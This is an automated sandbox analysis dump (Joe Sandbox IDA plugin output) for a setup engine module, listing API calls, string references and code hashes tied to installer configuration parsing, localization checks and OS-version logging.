                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Disabled CommandLineSwitch added: $DisabledCommandLineSwitches$No DisabledCommandLineSwitches block was specified$ParameterInfo.xml$The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit
                                                              • API String ID: 2489616738-1449725936
                                                              • Opcode ID: 4a963fbd607b7e561991004ec76511bda89cee469636587045ff6b6fa42b323c
                                                              • Instruction ID: a111cd867263a9737a6d9cfe18140c8e8d4e7c97970ccbcfcb13842651cbe0ab
                                                              • Opcode Fuzzy Hash: 4a963fbd607b7e561991004ec76511bda89cee469636587045ff6b6fa42b323c
                                                              • Instruction Fuzzy Hash: D2A16F71904249DFCB01CFA8C985AEEBBBABFA5308F244559E015EBB90D731DE45CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9249D5
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                              • __CxxThrowException@8.LIBCMT ref: 6C924A3C
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                                • Part of subcall function 6C9195C1: __EH_prolog3.LIBCMT ref: 6C9195C8
                                                                • Part of subcall function 6C9195C1: VariantInit.OLEAUT32(?), ref: 6C9195DB
                                                                • Part of subcall function 6C9195C1: SysFreeString.OLEAUT32(?), ref: 6C91960E
                                                                • Part of subcall function 6C9195C1: VariantClear.OLEAUT32(00000008), ref: 6C91962E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Variant$ClearDispatcherExceptionException@8FreeInitStringThrowUser
                                                              • String ID: Language$LocalizedText$Text$Unable to find Language element for LangID="%d" in localized data$W
                                                              • API String ID: 452683132-1012890799
                                                              • Opcode ID: 24eabfdf42dbfae095092fbb3e231573396af2e3890386f5bd5fda36015add99
                                                              • Instruction ID: aca38d1e343ea99e009cdd122e745144c0c49958a7973731283771ce44956a85
                                                              • Opcode Fuzzy Hash: 24eabfdf42dbfae095092fbb3e231573396af2e3890386f5bd5fda36015add99
                                                              • Instruction Fuzzy Hash: 3F916D71901209EFCB05CFA8C844ADDBBB9AF59718F24854AF410EB785C735DA45CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C922E48: __EH_prolog3.LIBCMT ref: 6C922E4F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9391B1
                                                              Strings
                                                              • Global Block Checks, xrefs: 6C939087, 6C9390B7
                                                              • Checking for global blockers, xrefs: 6C9390A8
                                                              • : StopBlockers evaluated to true., xrefs: 6C939209
                                                              • : SuccessBlockers evaluated to true., xrefs: 6C9391E8
                                                              • no blocking conditions found, xrefs: 6C939078
                                                              • : WarnBlockers evaluated to true., xrefs: 6C93921D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: no blocking conditions found$: StopBlockers evaluated to true.$: SuccessBlockers evaluated to true.$: WarnBlockers evaluated to true.$Checking for global blockers$Global Block Checks
                                                              • API String ID: 2489616738-2937627051
                                                              • Opcode ID: e7586ca84de2bc271d1e2346761065997b2ab864856f67364ec89177de147283
                                                              • Instruction ID: 2cdb2a4d2bb215b2629d9eb519130bb8033eb4c4b10fc87daa88c46357860929
                                                              • Opcode Fuzzy Hash: e7586ca84de2bc271d1e2346761065997b2ab864856f67364ec89177de147283
                                                              • Instruction Fuzzy Hash: 797156B1408785AFC720CF59C884A4BBBE8BB99318F404E1EF19983B50D775E949CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9238A8
                                                                • Part of subcall function 6C918D44: __EH_prolog3.LIBCMT ref: 6C918D4B
                                                                • Part of subcall function 6C923480: __EH_prolog3.LIBCMT ref: 6C923487
                                                              Strings
                                                              • ParameterInfo.xml, xrefs: 6C9238E3
                                                              • The mapping element defined: , xrefs: 6C923951
                                                              • Create CustomErrorRetry object, xrefs: 6C92399C
                                                              • Create CustomErrorMappingBase object, xrefs: 6C923A51
                                                              • Retry, xrefs: 6C923983, 6C9239B9
                                                              • schema validation failure: More than 1 CustomError Mapping block defined., xrefs: 6C9238D1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Create CustomErrorMappingBase object$Create CustomErrorRetry object$ParameterInfo.xml$Retry$The mapping element defined: $schema validation failure: More than 1 CustomError Mapping block defined.
                                                              • API String ID: 431132790-1753673958
                                                              • Opcode ID: 2dc957b19f331d25dbb91150e35a7390fbe9cc8db12f8b484eb88e4c4abd3ad4
                                                              • Instruction ID: 30114bce0b39f4c5fb68c3c5ec0878427f500dda2844c0c766e1da5ac84e58fb
                                                              • Opcode Fuzzy Hash: 2dc957b19f331d25dbb91150e35a7390fbe9cc8db12f8b484eb88e4c4abd3ad4
                                                              • Instruction Fuzzy Hash: B7518E719102099BDF14CBB8C945BEEB7F8BF29318F104659E064EBB84CB38D905CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91B014
                                                                • Part of subcall function 6C9491AF: CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,6C91B029,?,0000002C,6C95D55B,?,?,?,?,00000001), ref: 6C9491C5
                                                              • SysFreeString.OLEAUT32(?), ref: 6C91B044
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91B128
                                                              • SysFreeString.OLEAUT32(?), ref: 6C91B163
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                              Strings
                                                              • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 6C91B0F6
                                                              • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 6C91B033
                                                              • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 6C91B1CB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FreeH_prolog3String$CreateException@8InstanceThrow
                                                              • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                              • API String ID: 1763430278-2525052916
                                                              • Opcode ID: 9462a8ec30768ae9c5a5531bcaa76828469cc8fcbd9d56bbcfe123b9a6e9095d
                                                              • Instruction ID: e7d079ad0d3cc7750df4fbeef0e43894b24e494195c822156fef12c8286672f1
                                                              • Opcode Fuzzy Hash: 9462a8ec30768ae9c5a5531bcaa76828469cc8fcbd9d56bbcfe123b9a6e9095d
                                                              • Instruction Fuzzy Hash: CA519F72804149EFCB00DFE8C885DEEBBB9BF29318F154559E111A7B80DB34DA49CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C918168: GetFileSize.KERNEL32(?,?,?,?,?,6C943B9F,?,?,00000000,?,?,?,?,00000008,6C94EC79,?), ref: 6C918178
                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 6C952CA8
                                                              • __CxxThrowException@8.LIBCMT ref: 6C952CE7
                                                              • CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 6C952D19
                                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 6C952D32
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$H_prolog3$AttributesCopyException@8ExistsPathSizeThrow
                                                              • String ID: Copy of Header File failed$DHTML Header File doesn't exist$DHTMLLogger
                                                              • API String ID: 1055460099-1824744887
                                                              • Opcode ID: adc9a6bf1e51f0bd3ba7d21011e52593c798a87d5b02093a4aada0d5960a493f
                                                              • Instruction ID: cbb29fff9281f4a05b9d752ccacfe60c0934d0b5da3cab74fa8207832c0d1858
                                                              • Opcode Fuzzy Hash: adc9a6bf1e51f0bd3ba7d21011e52593c798a87d5b02093a4aada0d5960a493f
                                                              • Instruction Fuzzy Hash: E8519F725083459FC710DF64C844E9FBBE9BFA5358F440A2EF1A0D7A90D730D6188B56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C944E77
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C915FCE: __EH_prolog3.LIBCMT ref: 6C915FD5
                                                                • Part of subcall function 6C915FCE: PathIsRelativeW.SHLWAPI(?,?,?,?,?,ParameterInfo.xml,?,?,00000738,6C94FA6E,?,6C90A794,02642228), ref: 6C916018
                                                              • __CxxThrowException@8.LIBCMT ref: 6C944F68
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 6C944F7E
                                                              • FindCloseChangeNotification.KERNEL32(?), ref: 6C944FA1
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                                • Part of subcall function 6C91A3BC: __EH_prolog3.LIBCMT ref: 6C91A3C3
                                                              Strings
                                                              • ParameterInfo.xml, xrefs: 6C944FE5
                                                              • File %s could not be opened for read, xrefs: 6C944F0F
                                                              • File %s is not UTF-16 with Byte Order Marks (BOM), xrefs: 6C944FCC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ChangeCloseDispatcherExceptionException@8FileFindNotificationPathReadRelativeThrowUser
                                                              • String ID: File %s could not be opened for read$File %s is not UTF-16 with Byte Order Marks (BOM)$ParameterInfo.xml
                                                              • API String ID: 2138378564-652212332
                                                              • Opcode ID: 7027f40a45c8570010ac1f6d51882c4df945df6febcb4983d1f1d0c28dcef16f
                                                              • Instruction ID: f80e25d8be32c9f36f8f927c903a969e59c38ea7bba56f4e3f9a4e020ebf586b
                                                              • Opcode Fuzzy Hash: 7027f40a45c8570010ac1f6d51882c4df945df6febcb4983d1f1d0c28dcef16f
                                                              • Instruction Fuzzy Hash: 23516C71900149EFDF01CFE8C944ADEBBB9AF25318F14855AE115B7A80DB30CA19CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9254B8
                                                              • __CxxThrowException@8.LIBCMT ref: 6C925540
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              Strings
                                                              • \LocalizedData.xml: should have atleast one 'Language' child element!, xrefs: 6C925599
                                                              • ParameterInfo.xml, xrefs: 6C925565
                                                              • Unable to find Language element for LangID="%d" in localized data, xrefs: 6C92551A
                                                              • W, xrefs: 6C925530
                                                              • Schema validation failure in file , xrefs: 6C925575
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: ParameterInfo.xml$Schema validation failure in file $Unable to find Language element for LangID="%d" in localized data$W$\LocalizedData.xml: should have atleast one 'Language' child element!
                                                              • API String ID: 2489616738-3464115581
                                                              • Opcode ID: 5c401fbab1994108dcb799e2245dcdff338bd95ada1f5e3c126ef56d233d5862
                                                              • Instruction ID: 11803f25abf2c61648d27cc2141a05d6bf6b27d871d1575da6b505ed54cb8982
                                                              • Opcode Fuzzy Hash: 5c401fbab1994108dcb799e2245dcdff338bd95ada1f5e3c126ef56d233d5862
                                                              • Instruction Fuzzy Hash: 1541AE71A01208EFDB04CBE8C844BDDB7B9AF29318F244259F014EBB84DB34DA09CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C947F74
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • _memset.LIBCMT ref: 6C947FD4
                                                              • GetVersionExW.KERNEL32 ref: 6C947FED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3_Version_memset
                                                              • String ID: Could not determine OS version$OS Description = %s$OS Version = %d.%d.%d, Platform %d$OS Version Information
                                                              • API String ID: 3727276431-2914782974
                                                              • Opcode ID: b84c7c878a69884fd0987f560031c3d7405d7c54bdbb14153c27023b8d9b4a3c
                                                              • Instruction ID: 0204e5a682269a9ecda4b30ae609c8e47d4d5293bd4782abc8c4f72f7b39e69a
                                                              • Opcode Fuzzy Hash: b84c7c878a69884fd0987f560031c3d7405d7c54bdbb14153c27023b8d9b4a3c
                                                              • Instruction Fuzzy Hash: 7B4159719001189BCB24DBA8CC45BCDB7B8AF19308F0484D6E208E7A90D770EB98CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9195C8
                                                              • VariantInit.OLEAUT32(?), ref: 6C9195DB
                                                              • VariantClear.OLEAUT32(00000008), ref: 6C91962E
                                                              • SysFreeString.OLEAUT32(?), ref: 6C91960E
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • SysAllocString.OLEAUT32(00000000), ref: 6C919651
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9196F8
                                                              Strings
                                                              • schema validation error: attribute not found - , xrefs: 6C919676
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3StringVariant$AllocClearException@8FreeInitThrow
                                                              • String ID: schema validation error: attribute not found -
                                                              • API String ID: 8365360-3489740836
                                                              • Opcode ID: 0caecb9b6713c0f5ac0a1b9d3ac3aa6f0427557138c9934dea8224464f8b07f5
                                                              • Instruction ID: 514112107be74644e74dae3977c60ef2ade3c6ba0fae70a07c01e8d91140f544
                                                              • Opcode Fuzzy Hash: 0caecb9b6713c0f5ac0a1b9d3ac3aa6f0427557138c9934dea8224464f8b07f5
                                                              • Instruction Fuzzy Hash: 1B417371904249EFCB00DFA4C884EDE7B79BF25318F144659F421E7A40D734DA48CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C953752
                                                                • Part of subcall function 6C915D3F: __EH_prolog3.LIBCMT ref: 6C915D46
                                                                • Part of subcall function 6C915D3F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104,?,6C94831D,00000000), ref: 6C915D93
                                                                • Part of subcall function 6C91C259: __EH_prolog3.LIBCMT ref: 6C91C260
                                                                • Part of subcall function 6C948E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9599FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C948E6E
                                                              • PathFileExistsW.SHLWAPI(?,SetupResources.dll,00000000,00000738,00000000,6C94FA6E,0000000C,6C953A05,?,6C90A794,?), ref: 6C9537B7
                                                              • PathFileExistsW.SHLWAPI(00000000,LocalizedData.xml,00000000,00000738,00000000), ref: 6C953846
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                              Strings
                                                              • SetupResources.dll, xrefs: 6C9537A0
                                                              • SetupResources.dll missing from %d directory, xrefs: 6C9537BE
                                                              • LocalizedData.xml missing from %d directory, xrefs: 6C95384D
                                                              • LocalizedData.xml, xrefs: 6C953835
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$FilePath$Exists$AppendModuleName
                                                              • String ID: LocalizedData.xml$LocalizedData.xml missing from %d directory$SetupResources.dll$SetupResources.dll missing from %d directory
                                                              • API String ID: 3590062302-1245617268
                                                              • Opcode ID: ec459222ae4b448fdf9360bdb4cdbbdbc9d63cb8d8e67cfee01682afc15a19d4
                                                              • Instruction ID: 901e66e92186d73ad0ff5d3358415ad34627696aa1f8d4c989d37f82d403586d
                                                              • Opcode Fuzzy Hash: ec459222ae4b448fdf9360bdb4cdbbdbc9d63cb8d8e67cfee01682afc15a19d4
                                                              • Instruction Fuzzy Hash: 62319071900109EFDB10DBB8CC45ADE77B8AF32328F148651E524EBB91C730DA188BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C951021
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91C406: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C91C426
                                                                • Part of subcall function 6C91C406: RegQueryValueExW.KERNEL32(?,?,00000000,00000000,6C950F4A,00000004,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C91C43F
                                                                • Part of subcall function 6C91C406: RegCloseKey.KERNEL32(?,?,?,?,6C9535F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02642228,00000004,6C950F4A,?), ref: 6C91C44E
                                                              • GetLastError.KERNEL32(?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,6C94A58E,?,6C90A794,?,02642228,?,00000000,?), ref: 6C951092
                                                              • GetLastError.KERNEL32(?,00000000,?,Failed to record IsInternal,?,Software\Microsoft\DevDiv,?,?,PerfLab,?,?,0000000C,6C94A58E,?,6C90A794,?), ref: 6C9510F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prolog3Last$CloseOpenQueryValue
                                                              • String ID: Failed to record IsAdmin$Failed to record IsInternal$PerfLab$Software\Microsoft\DevDiv
                                                              • API String ID: 716194244-1174128248
                                                              • Opcode ID: 56a1b4c4496d695a07a8d1b9f53985e4c98c0c5141c0bc83b9f3bb6217160410
                                                              • Instruction ID: b7d793d5d0752b3211203372188d333518a293ce619546021da82e6bdc9c0f23
                                                              • Opcode Fuzzy Hash: 56a1b4c4496d695a07a8d1b9f53985e4c98c0c5141c0bc83b9f3bb6217160410
                                                              • Instruction Fuzzy Hash: AB31E471A00206EBD710CFB5CD059AE7BB9BFA6318B604619E420E7B90C730DA15CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9176B3
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • GetModuleFileNameW.KERNEL32(00000000,00000010,00000104), ref: 6C917711
                                                              • GetFileVersionInfoSizeW.KERNELBASE(00000010,?), ref: 6C91772A
                                                              • GetFileVersionInfoW.KERNELBASE(00000010,?,00000000,00000000), ref: 6C917745
                                                              • VerQueryValueW.VERSION(00000000,6C8F496C,?,?), ref: 6C91775D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$H_prolog3InfoVersion$ModuleNameQuerySizeValue
                                                              • String ID: %d.%d.%d.%d$0.0.0.0
                                                              • API String ID: 1538924429-464342551
                                                              • Opcode ID: d32818a9750c06609dd7a9f414278f7c2e9ff957de887f622e16cf690a295819
                                                              • Instruction ID: 3e258ff4862393cf6e84cc80063a3d8d17a27cd7f92790b1dbf5b3ce4b718786
                                                              • Opcode Fuzzy Hash: d32818a9750c06609dd7a9f414278f7c2e9ff957de887f622e16cf690a295819
                                                              • Instruction Fuzzy Hash: B8319FB1A0021AABDB04DFA5CC84CBFB779BF65358B10452AF851A7B80D730DD06DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
